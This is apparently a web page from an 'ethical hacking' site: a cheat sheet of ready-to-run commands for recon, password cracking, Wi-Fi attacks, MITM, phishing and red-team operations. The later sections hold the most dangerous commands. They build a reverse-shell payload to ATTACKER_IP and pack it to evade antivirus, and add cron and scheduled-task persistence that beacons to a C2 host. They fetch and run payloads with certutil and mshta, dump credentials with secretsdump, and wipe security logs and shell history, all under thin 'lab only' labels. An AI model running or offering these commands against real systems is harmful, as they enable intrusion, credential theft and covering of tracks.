ARG Cyber Skill Hub
ARG Cyber Skill Hub
Ethical Hacking • Cyber Security • Termux • PowerShell • CMD
Purpose: Network discovery, service & OS detection
sudo nmap 192.168.1.10
Performs a basic scan to find open ports on the target host.
sudo nmap -sC -sV 192.168.1.10
Runs default scripts and detects service versions on open ports.
sudo nmap -p- -A 192.168.1.10
Scans all TCP ports with OS detection and aggressive enumeration.
Purpose: GUI interface for Nmap (visual reports)
sudo zenmap
Launches the graphical interface for Nmap scanning.
Target: 192.168.1.0/24
Scans the entire local subnet using GUI scan profiles.
Purpose: Find live hosts in local network (ARP scan)
sudo netdiscover -r 192.168.1.0/24
Actively scans the subnet to discover all connected devices.
sudo netdiscover -p
Runs in passive mode to silently detect devices via ARP traffic.
Purpose: OSINT automation framework
recon-ng
Starts the Recon-ng interactive console.
workspaces create target
Creates a new workspace to organize reconnaissance data.
modules use recon/domains-hosts/google_site_web
Loads a module to gather hosts and subdomains from Google.
set SOURCE example.com
Sets the target domain for OSINT collection.
run
Executes the loaded reconnaissance module.
Purpose: Visual OSINT relationship mapping
maltego
Launches the Maltego GUI for visual intelligence gathering.
Domain → To DNS Name → To IP Address
Uses transforms to map relationships between domain, DNS, and IP.
Purpose: Emails, subdomains, hosts collection
theHarvester -d example.com -b google,bing
Collects emails and subdomains from Google and Bing.
theHarvester -d example.com -b all -f report.html
Gathers data from all sources and saves output as an HTML report.
Purpose: Deep domain information gathering
dmitry -winsepo example.com
Performs whois lookup, subdomain search, and email harvesting.
Purpose: DNS records & subdomain brute force
dnsenum example.com
Enumerates DNS records and common subdomains for a domain.
dnsenum --dnsserver 8.8.8.8 -f subdomains.txt example.com
Uses a wordlist to brute-force subdomains using a specific DNS server.
Purpose: DNS reconnaissance
dnsrecon -d example.com
Enumerates DNS records and zone information.
dnsrecon -d example.com -t brt
Performs brute-force subdomain enumeration.
Purpose: Domain registration info
whois example.com
Shows domain registration and owner information.
whois 8.8.8.8
Displays ownership and network info of an IP address.
Purpose: Advanced subdomain enumeration
amass enum -passive -d example.com
Collects subdomains using passive data sources only.
amass enum -active -d example.com -o subs.txt
Performs active enumeration and saves results to a file.
Purpose: Full vulnerability scanning
sudo gvm-setup
Initial setup for Greenbone Vulnerability Manager services and feeds.
sudo gvm-start
Starts the OpenVAS/GVM services in background.
https://127.0.0.1:9392
Access the web dashboard to manage scans and view reports.
Purpose: Web server misconfiguration scan
nikto -h http://example.com
Scans a web server for common vulnerabilities and misconfigurations.
nikto -h http://example.com -Tuning x
Runs Nikto with advanced tuning options for deeper checks.
Purpose: WordPress vulnerability scanner
wpscan --url https://site.com --enumerate vp,vt,u
Enumerates vulnerable plugins, themes, and users on WordPress site.
wpscan --url https://site.com --api-token YOUR_TOKEN
Uses WPScan API token for detailed vulnerability database results.
Purpose: Linux security auditing
sudo lynis audit system
Audits Linux system for security weaknesses and misconfigurations.
sudo lynis show suggestions
Shows recommended security improvements after audit.
Purpose: Automated recon + vuln framework
legion
Launches Legion GUI for automated reconnaissance and scanning.
Add target → Run modules
Adds targets and runs built-in scanning modules automatically.
Purpose: Template-based vulnerability scanner
nuclei -u https://site.com -t cves/
Scans target using CVE templates for known vulnerabilities.
nuclei -l targets.txt -severity critical,high
Scans multiple targets and reports only high/critical issues.
Purpose: Exploit + payload framework
msfconsole
Starts Metasploit interactive console.
search apache
Searches Metasploit database for Apache-related exploits.
use exploit/multi/http/apache_mod_cgi_bash_env_exec
Loads a specific exploit module for Apache vulnerability.
set RHOSTS 192.168.1.10
Sets the target IP address for exploitation.
run
Executes the selected exploit module.
Purpose: Browser exploitation framework
sudo beef-xss
Starts BeEF server for browser exploitation testing in lab.
Hook URL → Test in lab browser
Uses the hook URL in a test browser to demonstrate client-side attacks.
Purpose: GUI for Metasploit
armitage
Launches Armitage graphical interface for Metasploit.
Connect to msfrpcd
Connects Armitage to Metasploit RPC service to control exploits.
Purpose: Search Exploit-DB locally
searchsploit apache 2.4
Searches local exploit database for Apache 2.4 exploits.
searchsploit -m exploits/linux/remote/12345.py
Copies an exploit PoC to your local directory.
Purpose: Phishing & social engineering labs
setoolkit
Starts Social Engineering Toolkit interactive menu.
1) Social-Engineering Attacks → 2) Website Attack Vectors
Launches phishing website cloning attack module (lab only).
Purpose: System ka IP address aur network interfaces dekhna.
ip a
ifconfig
hostname -I
nmcli device status
Ye commands tumhare device ka IP, interfaces aur network state batate hain.
Purpose: Internet aur server reachability test karna.
ping google.com
ping -c 4 8.8.8.8
traceroute google.com
mtr google.com
Ping latency batata hai, traceroute/mtr route path dikhata hai.
Purpose: Open ports aur services scan karna (authorized targets only).
nmap 192.168.1.1
nmap -sS 192.168.1.1
nmap -A 192.168.1.1
nmap -p 1-1000 192.168.1.1
Service detection aur OS fingerprinting ke liye -A use hota hai.
Purpose: Network packets capture & analyze karna.
tcpdump
tcpdump -i wlan0
tcpdump -n port 80
tcpdump -w capture.pcap
Captured file Wireshark me analyze ki ja sakti hai.
Purpose: Local network me connected devices dhoondhna.
arp -a
ip neigh
netdiscover -r 192.168.1.0/24
arp-scan --localnet
Local LAN me kaun-kaun device connected hai wo dikhta hai.
Purpose: WiFi interface ko monitor mode me dalna (lab testing only).
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
iwconfig
Monitor mode se wireless packets capture kiye ja sakte hain.
Purpose: Running services ki details nikalna.
nmap -sV 192.168.1.1
nmap --script=banner 192.168.1.1
whatweb http://192.168.1.1
nikto -h http://192.168.1.1
Web services ka fingerprinting hota hai.
Purpose: Network traffic forward & route karna (lab use).
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -L
route -n
ip route show
Man-in-the-middle labs aur routing tests ke liye use hota hai.
Purpose: Create, remove, copy, move, and organize files & folders in Linux systems.
mkdir tools
Creates a new directory named tools.
rmdir tools
Deletes an empty directory named tools.
rm -rf tools
Force deletes the directory tools with all files inside (dangerous).
cp file.txt /home/kali/
Copies file.txt to another directory.
mv file.txt newfile.txt
Renames or moves a file.
Purpose: Read, view, and edit files from the terminal.
cat file.txt
Displays the entire content of a file.
less file.txt
View large files page by page.
nano file.txt
Edit a file using nano text editor.
vim file.txt
Edit a file using vim editor (advanced editor).
Purpose: Check disk usage and storage details.
df -h
Shows available disk space in human readable format.
du -sh *
Shows folder size of all directories.
lsblk
Displays connected storage devices.
mount
Shows mounted drives.
Purpose: Monitor and control running processes.
ps aux
Lists all running processes.
top
Shows live running processes and system usage.
htop
Advanced process viewer (if installed).
kill -9 PID
Force stop a running process by PID.
Purpose: Get hardware and OS information.
uname -a
Displays kernel and OS information.
neofetch
Shows system info with cool terminal UI.
uptime
Shows how long the system is running.
free -h
Displays RAM usage.
Purpose: View and configure network interfaces and IP addresses.
ip a
Displays all network interfaces and assigned IP addresses.
ip link show
Shows network interface status (UP/DOWN).
ifconfig
Displays network configuration (legacy command).
nmcli device status
Shows NetworkManager device status.
Purpose: Test internet and network reachability.
ping 8.8.8.8
Tests connectivity to Google DNS server.
ping google.com
Checks if DNS resolution and internet is working.
traceroute google.com
Shows the network path packets take to reach the destination.
mtr google.com
Live traceroute + ping combined (if installed).
Purpose: Discover open ports and services on authorized targets.
nmap 192.168.1.1
Scans common ports on a target host.
nmap -sV 192.168.1.1
Detects running services and versions.
nmap -A 192.168.1.1
Performs aggressive scan (OS, services, scripts).
nmap -p- 192.168.1.1
Scans all 65535 TCP ports.
Purpose: View active network connections and listening services.
ss -tuln
Shows TCP/UDP listening ports.
netstat -tulnp
Displays network services with PID (legacy).
lsof -i
Lists processes using network connections.
whois google.com
Displays domain ownership information.
Purpose: Capture and analyze network traffic on authorized networks.
tcpdump -i wlan0
Captures packets on wlan0 interface.
tcpdump -i eth0 port 80
Captures only HTTP traffic.
tcpdump -w capture.pcap
Saves captured packets to a file.
wireshark
Opens GUI packet analyzer tool.
Purpose: Send HTTP requests and test web endpoints from terminal.
curl https://example.com
Fetches and displays the raw HTML response of a website.
curl -I https://example.com
Shows only HTTP response headers.
curl -X POST -d "user=admin&pass=1234" https://site.com/login
Sends a POST request with form data.
curl -o page.html https://example.com
Downloads and saves the webpage to a file.
Purpose: Download web content and files from the internet.
wget https://example.com/file.zip
Downloads a file from the given URL.
wget -O index.php https://example.com
Downloads a webpage and saves it as index.php.
wget -r https://example.com
Recursively downloads a website (use only on owned sites).
wget -c https://example.com/bigfile.zip
Continues a previously interrupted download.
Purpose: Scan web servers for misconfigurations and known vulnerabilities.
nikto -h https://example.com
Performs a basic vulnerability scan on a web server.
nikto -h http://192.168.1.10
Scans a local server by IP address.
nikto -h https://example.com -o report.html
Saves scan results into an HTML report.
nikto -Tuning x -h https://example.com
Runs advanced tuning options for deeper scanning.
Purpose: Brute-force hidden directories and files on websites.
gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt
Finds hidden directories using a wordlist.
gobuster dir -u https://example.com -w wordlist.txt -x php,txt,html
Searches for files with specific extensions.
gobuster dns -d example.com -w subdomains.txt
Brute-forces subdomains of a domain.
gobuster vhost -u https://example.com -w vhosts.txt
Finds virtual hosts on the same IP.
Purpose: Web path and directory brute-forcing tool.
python3 dirsearch.py -u https://example.com
Scans for hidden directories using default wordlists.
python3 dirsearch.py -u https://example.com -e php,txt,html
Searches for files with specific extensions.
python3 dirsearch.py -u https://example.com -w wordlist.txt
Uses a custom wordlist.
python3 dirsearch.py -u https://example.com -t 50
Increases scanning threads for faster results.
Purpose: Identify technologies used by a website.
whatweb https://example.com
Detects CMS, frameworks, and server technologies.
whatweb -a 3 https://example.com
Runs aggressive detection mode.
whatweb --log-json report.json https://example.com
Saves technology fingerprint into JSON file.
whatweb --no-errors https://example.com
Suppresses error output for clean results.
Purpose: Intercept, modify, and analyze web requests.
burpsuite
Launches Burp Suite GUI.
# Configure browser proxy to 127.0.0.1:8080
Routes browser traffic through Burp for interception.
# Intercept → Repeater → Intruder
Allows manual testing and automated attacks in labs.
# Generate reports from Dashboard
Creates vulnerability reports for documentation.
Purpose: Automated web vulnerability scanner.
zaproxy
Launches ZAP GUI.
# Automated Scan → Start
Runs automatic vulnerability scanning.
# Active Scan (after crawling)
Performs deeper security testing.
# Export report as HTML/PDF
Generates vulnerability reports.
Purpose: Automate detection and exploitation of SQL Injection (lab only).
sqlmap -u "https://site.com?id=1" --dbs
Enumerates available databases.
sqlmap -u "https://site.com?id=1" --tables
Lists tables from the vulnerable database.
sqlmap -u "https://site.com?id=1" --dump
Extracts database contents (authorized labs only).
sqlmap -r request.txt --batch
Uses raw HTTP request file for testing.
Purpose: Perform online login brute-force attacks on network services (lab only).
hydra -l admin -P rockyou.txt ssh://192.168.1.10
Attempts SSH login with username "admin" using a password wordlist.
hydra -L users.txt -P pass.txt ftp://192.168.1.10
Uses multiple usernames and passwords against an FTP service.
hydra -l admin -P rockyou.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"
Performs HTTP POST form login testing for web applications.
hydra -t 4 -f -V -l root -P rockyou.txt ssh://192.168.1.10
Limits threads, stops on first success, and shows verbose output.
Purpose: Offline password hash cracking using CPU-based attacks.
john --wordlist=rockyou.txt hashes.txt
Cracks password hashes using a wordlist.
john --rules --wordlist=rockyou.txt hashes.txt
Applies mangling rules to generate more password candidates.
john --show hashes.txt
Displays successfully cracked passwords.
john --format=raw-md5 hashes.txt
Specifies hash format for better accuracy.
Purpose: GPU-accelerated password cracking tool.
hashcat -m 0 -a 0 hashes.txt rockyou.txt
Dictionary attack on MD5 hashes using a wordlist.
hashcat -m 1000 -a 0 ntlm.txt rockyou.txt
Cracks Windows NTLM password hashes.
hashcat -a 3 -m 0 hashes.txt ?a?a?a?a?a?a
Brute-force attack with mask patterns.
hashcat --show -m 0 hashes.txt
Shows cracked passwords.
Purpose: Generate custom password wordlists.
crunch 6 6 abc123 -o small.txt
Generates all 6-character combinations using abc123.
crunch 8 10 -o biglist.txt
Creates a wordlist with passwords from 8 to 10 characters.
crunch 4 4 0123456789 -o pin.txt
Generates all possible 4-digit PIN codes.
crunch 8 8 -t @@@@2026 -o pattern.txt
Generates passwords matching a specific pattern.
Purpose: Generate wordlists from website content.
cewl https://example.com -w words.txt
Extracts words from a website and saves them to a file.
cewl https://example.com -d 2 -w deep.txt
Crawls website up to depth 2 to collect more words.
cewl https://example.com --with-numbers -w mixed.txt
Includes numbers in generated wordlist.
cewl https://example.com -m 5 -w minlen.txt
Collects words with minimum length of 5 characters.
Purpose: Collection of high-quality wordlists for security testing.
sudo apt install seclists
Installs the SecLists wordlist collection.
ls /usr/share/seclists/Passwords/
Lists available password wordlists.
cat /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
Views a large common passwords list.
cp /usr/share/seclists/Passwords/Common-Credentials/*.txt ./wordlists/
Copies wordlists to your local project folder.
Purpose: Capture Wi-Fi handshakes and audit WPA/WPA2 passwords in lab environments.
airmon-ng start wlan0
Enables monitor mode on the wireless adapter.
airodump-ng wlan0mon
Scans nearby Wi-Fi networks and connected clients.
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
Targets a specific access point and saves handshake packets.
aircrack-ng -w rockyou.txt capture-01.cap
Attempts to crack the captured WPA/WPA2 handshake using a wordlist.
Purpose: Automated Wi-Fi auditing framework for quick lab testing.
sudo wifite
Launches the interactive Wi-Fi attack automation tool.
sudo wifite --wps
Targets only WPS-enabled networks.
sudo wifite --dict rockyou.txt
Uses a custom dictionary for password cracking.
sudo wifite --kill
Kills interfering network processes before attacks.
Purpose: Test WPS PIN security on routers in controlled labs.
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
Starts a verbose WPS PIN audit against a target access point.
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1
Attempts Pixie Dust attack if supported by the router.
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6
Forces testing on a specific Wi-Fi channel.
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -t 5
Sets timeout between attempts to avoid lockouts.
Purpose: Enable monitor mode and discover nearby wireless networks.
# Check wireless interfaces ip link # Enable monitor mode (replace wlan0) sudo airmon-ng check kill sudo airmon-ng start wlan0 # Passive recon airodump-ng wlan0mon
Identifies nearby APs, channels, encryption (WPA2/WPA3), clients, and signal strength for attack surface mapping.
Purpose: Capture WPA2/WPA3 handshakes for offline password auditing (lab networks).
# Capture specific AP (replace BSSID & channel) airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # Deauth to force handshake (lab AP only) aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon # Verify handshake captured aircrack-ng capture-01.cap
Used in authorized audits to collect handshakes for offline cracking against weak PSKs in lab networks.
Purpose: Capture PMKID without deauth or client interaction.
# Capture PMKID sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 # Extract hash hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng # Offline crack (lab only) hashcat -m 22000 pmkid.hc22000 wordlist.txt
Effective for auditing weak PSKs on modern routers without client presence (authorized environments only).
Purpose: Simulate rogue AP with phishing captive portal for security awareness training.
# Create fake AP (hostapd) sudo apt install hostapd dnsmasq # Launch rogue AP (example) hostapd hostapd.conf # Redirect victims to captive portal (iptables) sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 # Serve phishing page (lab awareness) php -S 0.0.0.0:8080
Demonstrates Evil Twin risks, credential harvesting via captive portals, and user awareness training scenarios.
Purpose: Automate Evil Twin + phishing portal for awareness labs.
# Install sudo apt install wifiphisher # Launch phishing attack (lab only) sudo wifiphisher # Choose scenario (firmware update, portal login, etc.) # Select target AP when prompted
Used for red-team simulations and awareness training to demonstrate how users fall for rogue Wi-Fi portals.
Purpose: Wireless IDS and packet sniffer with a web interface.
kismet
Starts Kismet service and web UI.
http://localhost:2501
Opens the Kismet web dashboard in a browser.
kismet -c wlan0
Starts capture on a specific wireless interface.
kismet -c wlan0mon --no-line-wrap
CLI capture without line wrapping for logs.
Purpose: Evil-Twin attack framework for Wi-Fi security labs.
git clone https://github.com/FluxionNetwork/fluxion.git
Downloads the Fluxion framework from GitHub.
cd fluxion
Moves into the Fluxion project directory.
sudo ./fluxion.sh
Launches the Fluxion interactive attack wizard.
sudo ./fluxion.sh -i
Runs Fluxion in interactive guided mode.
Purpose: GUI-based Wi-Fi auditing tool for beginners.
fern-wifi-cracker
Launches the graphical interface for Wi-Fi testing.
sudo fern-wifi-cracker
Runs Fern with elevated permissions.
fern-wifi-cracker --help
Displays available options and usage help.
fern-wifi-cracker --version
Shows the installed version.
Purpose: Capture and analyze network packets.
wireshark
Launches the Wireshark GUI packet analyzer.
sudo wireshark
Runs Wireshark with elevated permissions.
tshark -i eth0
CLI capture on interface eth0.
tshark -i eth0 -w capture.pcap
Saves captured packets to a file.
Purpose: Modular MITM framework for network testing in labs.
sudo bettercap -iface eth0
Starts Bettercap on a specific network interface.
net.probe on
Discovers live hosts on the local network.
arp.spoof on
Performs ARP spoofing in a test environment.
http.proxy on
Enables HTTP proxy for traffic inspection.
Purpose: Perform ARP poisoning and MITM testing in controlled networks.
sudo ettercap -T -q -i eth0 -M arp:remote /victim/ /router/
Text-mode ARP spoofing between victim and router.
sudo ettercap -G
Launches the graphical interface.
sudo ettercap -T -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/
Targets specific IP addresses.
sudo ettercap -T -q -i eth0 -M arp:remote // //
MITM against all hosts in the subnet (lab only).
Purpose: Command-line packet capture and filtering.
sudo tcpdump -i eth0
Captures live traffic on interface eth0.
sudo tcpdump -i eth0 -w capture.pcap
Saves captured packets to a file.
sudo tcpdump -i eth0 tcp port 80
Filters HTTP traffic only.
sudo tcpdump -r capture.pcap
Reads packets from a saved capture file.
Purpose: LLMNR/NBT-NS poisoning tool for Windows network labs.
sudo responder -I eth0
Starts Responder on a network interface.
sudo responder -I eth0 -dwv
Enables detailed logs and rogue servers.
sudo responder -I eth0 -A
Analyze mode without poisoning (safe lab analysis).
cat /usr/share/responder/logs/*
Views captured hashes and events.
Purpose: Automated detection and exploitation of SQL injection vulnerabilities in web applications.
sqlmap -u "http://target.com/page.php?id=1" --dbs
Enumerates available databases if SQL injection is found.
sqlmap -u "http://target.com/page.php?id=1" -D testdb --tables
Lists tables inside a specific database.
sqlmap -u "http://target.com/page.php?id=1" -D testdb -T users --dump
Dumps records from the selected table.
Purpose: Advanced Cross-Site Scripting (XSS) vulnerability scanner and payload generator.
xsstrike -u "http://target.com/search?q=test"
Scans a parameter for reflected and DOM-based XSS.
xsstrike -u "http://target.com/search?q=test" --crawl
Crawls the website to discover additional injectable endpoints.
xsstrike -u "http://target.com/search?q=test" --fuzzer
Fuzzes input parameters with multiple XSS payloads.
Purpose: Finds hidden directories and files on web servers using wordlists.
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
Bruteforces common directories.
gobuster dir -u http://target.com -w wordlist.txt -x php,txt,html
Searches for files with specific extensions.
gobuster dns -d target.com -w subdomains.txt
Performs subdomain enumeration.
Purpose: Discovers hidden GET and POST parameters in web applications.
arjun -u http://target.com/page.php
Finds hidden parameters in GET requests.
arjun -u http://target.com/api -m POST
Tests hidden POST parameters.
arjun -u http://target.com/page.php -o found_params.txt
Saves discovered parameters to a file.
Purpose: Scans web servers for outdated software, misconfigurations, and known vulnerabilities.
nikto -h http://target.com
Performs a basic vulnerability scan.
nikto -h http://target.com -o report.txt
Saves scan results to a report file.
nikto -h http://target.com -Tuning x
Runs specific vulnerability tests.
Purpose: Fast web fuzzer for discovering directories, parameters, and hidden endpoints.
ffuf -u http://target.com/FUZZ -w wordlist.txt
Fuzzes directories on the target website.
ffuf -u http://target.com/page.php?FUZZ=test -w params.txt
Discovers hidden parameters.
ffuf -u http://target.com/FUZZ -w wordlist.txt -mc 200
Shows only HTTP 200 OK responses.
Purpose: Automated detection and exploitation of SQL injection vulnerabilities in web applications.
sqlmap -u "http://target.com/page.php?id=1" --dbs
Enumerates available databases if SQL injection is found.
sqlmap -u "http://target.com/page.php?id=1" -D testdb --tables
Lists tables inside a specific database.
sqlmap -u "http://target.com/page.php?id=1" -D testdb -T users --dump
Dumps records from the selected table.
Purpose: Advanced Cross-Site Scripting (XSS) vulnerability scanner and payload generator.
xsstrike -u "http://target.com/search?q=test"
Scans a parameter for reflected and DOM-based XSS.
xsstrike -u "http://target.com/search?q=test" --crawl
Crawls the website to discover additional injectable endpoints.
xsstrike -u "http://target.com/search?q=test" --fuzzer
Fuzzes input parameters with multiple XSS payloads.
Purpose: Finds hidden directories and files on web servers using wordlists.
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
Bruteforces common directories.
gobuster dir -u http://target.com -w wordlist.txt -x php,txt,html
Searches for files with specific extensions.
gobuster dns -d target.com -w subdomains.txt
Performs subdomain enumeration.
Purpose: Discovers hidden GET and POST parameters in web applications.
arjun -u http://target.com/page.php
Finds hidden parameters in GET requests.
arjun -u http://target.com/api -m POST
Tests hidden POST parameters.
arjun -u http://target.com/page.php -o found_params.txt
Saves discovered parameters to a file.
Purpose: Scans web servers for outdated software, misconfigurations, and known vulnerabilities.
nikto -h http://target.com
Performs a basic vulnerability scan.
nikto -h http://target.com -o report.txt
Saves scan results to a report file.
nikto -h http://target.com -Tuning x
Runs specific vulnerability tests.
Purpose: Fast web fuzzer for discovering directories, parameters, and hidden endpoints.
ffuf -u http://target.com/FUZZ -w wordlist.txt
Fuzzes directories on the target website.
ffuf -u http://target.com/page.php?FUZZ=test -w params.txt
Discovers hidden parameters.
ffuf -u http://target.com/FUZZ -w wordlist.txt -mc 200
Shows only HTTP 200 OK responses.
Purpose: Search and profile internet-exposed devices, services, and vulnerabilities across the global internet.
shodan init YOUR_API_KEY
Initializes Shodan CLI with your API key.
shodan search "port:22 country:IN"
Finds exposed SSH services in India.
shodan host 8.8.8.8
Displays open services and metadata of a specific host.
Purpose: Enumerate subdomains and TLS certificates issued for a target domain using certificate transparency logs.
curl "https://crt.sh/?q=%25example.com&output=json"
Fetches all certificates issued for example.com in JSON format.
curl "https://crt.sh/?q=%25example.com" | grep example.com
Quickly extracts subdomains from HTML output.
curl "https://crt.sh/?q=%25.example.com&output=json" | jq '.[].name_value'
Parses unique subdomains using jq.
Purpose: Discover historical endpoints, parameters, and hidden files from archived snapshots.
waybackurls example.com > wayback.txt
Collects archived URLs related to the target domain.
cat wayback.txt | grep "\.php" > php_endpoints.txt
Filters PHP endpoints for vulnerability analysis.
cat wayback.txt | grep "?" > params.txt
Extracts URLs containing parameters.
Purpose: Visually inspect subdomains, detect misconfigurations, and identify potential takeover opportunities.
cat subs.txt | aquatone -ports 80,443,8080
Scans subdomains and captures screenshots.
aquatone-discover -d example.com
Performs automated subdomain discovery.
aquatone -scan-timeout 3000 -out aquatone_out
Adjusts scan timeout and output directory.
Purpose: Perform in-depth DNS enumeration using passive and active techniques with data correlation.
amass enum -passive -d example.com
Performs passive subdomain enumeration.
amass enum -active -d example.com -p 80,443,8080
Performs active enumeration with port scanning.
amass intel -org "Example Corp"
Collects intelligence related to an organization.
Purpose: Build a large attack surface using multiple passive sources before active scanning.
subfinder -d example.com -all -o subs.txt
Collects subdomains from passive sources without touching the target directly.
assetfinder --subs-only example.com >> subs.txt
Finds additional subdomains to expand the target scope.
sort -u subs.txt -o subs.txt
Removes duplicates and keeps the final unique list.
Purpose: Identify which subdomains are actually alive and serving web content.
httpx -l subs.txt -status-code -title -tech-detect -o live.txt
Checks which hosts respond over HTTP/HTTPS and fingerprints technologies.
cat live.txt | awk '{print $1}' > live_hosts.txt
Extracts clean URLs for further testing.
wafw00f -i live_hosts.txt
Detects WAF presence to plan evasion strategies.
Purpose: Discover hidden endpoints and parameters for deeper vulnerability testing.
gau example.com | tee urls.txt
Fetches historical URLs from public archives to find hidden endpoints.
waybackurls example.com >> urls.txt
Adds more archived URLs from Wayback Machine.
grep "=" urls.txt | sort -u > params.txt
Extracts parameterized URLs useful for injection testing.
Purpose: Quickly triage large URL lists for high-impact vulnerabilities.
nuclei -l live_hosts.txt -severity critical,high -o nuclei_hits.txt
Runs high-impact vulnerability templates to reduce noise.
gf xss params.txt > xss_candidates.txt
Filters URLs likely vulnerable to XSS for manual validation.
gf sqli params.txt > sqli_candidates.txt
Filters URLs likely vulnerable to SQL injection.
Purpose: Confirm vulnerabilities manually to avoid false positives before reporting.
curl -i "https://target.com/search?q=<script>alert(1)</script>"
Tests reflected XSS manually by observing response behavior.
sqlmap -u "https://target.com/item?id=1" --risk=3 --level=5 --batch
Performs deep SQL injection validation in authorized scope.
ffuf -u https://target.com/FUZZ -w params.txt
Fuzzes endpoints to discover hidden functionality.
Purpose: Create reproducible, high-quality vulnerability reports for bug bounty platforms.
mkdir -p reports/screenshots
Creates a structured folder for evidence and screenshots.
echo "Steps to Reproduce" > report.md
Initializes a markdown report template.
zip -r poc.zip reports/
Bundles proof-of-concept evidence for submission.
Purpose: Red-team command-and-control framework for adversary emulation in controlled lab environments.
./teamserver 0.0.0.0 StrongPassword
Starts the C2 team server for collaborative red-team operations.
./cobaltstrike
Launches the client interface to manage beacons and sessions.
beacon> run whoami
Executes a command on an active beacon session.
Purpose: Open-source command-and-control framework used for red-team operations and adversary simulation.
sliver-server
Starts the Sliver command-and-control server.
generate --http 192.168.1.5
Generates a payload that connects back to the C2 server.
use beacon <id>
Interacts with a specific compromised session.
Purpose: Automate exploitation workflows by controlling Metasploit via RPC API for large-scale testing.
msfrpcd -P StrongPass -S -a 127.0.0.1
Starts Metasploit RPC daemon with authentication.
msfconsole -x "db_connect msf:pass@127.0.0.1/msf"
Connects Metasploit to a database for automation.
use auxiliary/scanner/http/title
Loads an auxiliary scanner module for automated recon.
Purpose: Commercial exploitation platform for automated penetration testing and reporting.
coreimpact
Launches the Core Impact GUI client.
connect agent
Connects to deployed agents in a test environment.
run exploit modules
Executes selected exploitation modules.
Purpose: Perform advanced network protocol attacks and lateral movement in enterprise test labs.
psexec.py domain/user:pass@192.168.1.20
Executes commands remotely via SMB in a lab network.
wmiexec.py domain/user:pass@192.168.1.20
Executes commands using WMI for stealthier execution.
secretsdump.py domain/user:pass@192.168.1.20
Extracts credential material from a compromised host.
Purpose: Simulate real-world phishing campaigns to evaluate user awareness and email security controls.
sudo systemctl start gophish
Starts the GoPhish service for managing phishing campaigns.
ssh -L 3333:127.0.0.1:3333 user@redteam-server
Creates a secure tunnel to access the GoPhish admin panel remotely.
firefox http://127.0.0.1:3333
Opens the GoPhish dashboard to configure templates and campaigns.
Purpose: Prepare obfuscated payloads to test endpoint detection and response (EDR) evasion.
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=ATTACKER_IP LPORT=443 -f exe -o payload.exe
Generates an encrypted HTTPS reverse shell payload for Windows testing labs.
upx --best --ultra-brute payload.exe
Compresses and obfuscates the binary to evade basic signature detection.
sigcheck -u payload.exe
Checks digital signature and reputation to understand detection surface.
Purpose: Establish an encrypted C2 channel to simulate advanced adversary communications.
ssh -N -R 8443:localhost:8443 c2@c2server
Creates a reverse SSH tunnel for covert command and control.
socat TCP-LISTEN:8443,fork,reuseaddr TCP:127.0.0.1:4444
Forwards traffic from the exposed port to the internal C2 service.
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Creates a self-signed TLS certificate to encrypt C2 communications.
Purpose: Move laterally inside a segmented network using pivoting techniques.
ssh -D 1080 user@compromised-host
Creates a SOCKS proxy tunnel for pivoting into internal network segments.
proxychains nmap -sT 10.10.0.0/24
Scans internal network through the pivot tunnel.
ssh -J user@compromised-host admin@internal-server
Uses SSH jump host to access deeper internal systems.
Purpose: Test detection of persistence mechanisms used by advanced attackers.
(crontab -l 2>/dev/null; echo "*/30 * * * * /usr/bin/curl http://c2server/ping") | crontab -
Creates a recurring beacon to simulate persistence on Linux systems.
schtasks /create /sc minute /mo 30 /tn "Updater" /tr "payload.exe"
Creates a scheduled task on Windows for persistence testing.
crontab -l
Verifies persistence mechanism is active.
Purpose: Simulate stealthy execution using native OS tools to test SOC detection capabilities.
certutil -urlcache -split -f http://c2server/payload.exe payload.exe
Downloads a file using a built-in Windows utility to bypass basic controls.
mshta http://c2server/launcher.hta
Executes remote scripts using trusted Windows binaries.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();
Executes script through a native DLL loader to evade detection.
Purpose: Safely remove artifacts and document lessons learned after an engagement.
wevtutil cl Security
Clears Windows Security logs in a controlled lab environment.
shred -u payload.exe
Securely deletes payload files to prevent recovery.
history -c
Clears shell history to reduce operational traces (authorized labs only).
Purpose: Simulate voice-based social engineering to test employee verification workflows and call-handling procedures.
sudo apt install asterisk
Installs a private PBX system to simulate internal corporate calls.
sudo systemctl start asterisk
Starts the PBX service for creating controlled vishing scenarios.
asterisk -rvv
Opens the interactive console to manage extensions and call flows.
Purpose: Test mobile phishing detection and user awareness through simulated SMS campaigns.
pip3 install flask twilio
Installs libraries required to build a phishing simulation API for SMS testing.
export TWILIO_ACCOUNT_SID=XXXX
Configures API credentials for controlled SMS delivery in a test environment.
python3 smish_server.py
Launches a local SMS phishing simulation server for training labs.
Purpose: Design believable pretext stories to evaluate identity verification and escalation controls.
mkdir pretext-cases
Creates a workspace to document and manage pretexting scenarios.
nano pretext-cases/hr-password-reset.md
Creates a scripted scenario to simulate HR password reset requests.
gpg -c pretext-cases/hr-password-reset.md
Encrypts sensitive pretext scripts to protect red team OPSEC.
Purpose: Quickly triage suspicious binaries to identify indicators of compromise and hidden functionality.
file sample.bin
Identifies the binary type and architecture.
strings -n 6 sample.bin | less
Extracts human-readable strings to discover URLs, API keys, or debug messages.
readelf -h sample.bin
Displays ELF headers to understand compilation details.
Purpose: Observe runtime behavior of malware samples in an isolated sandbox.
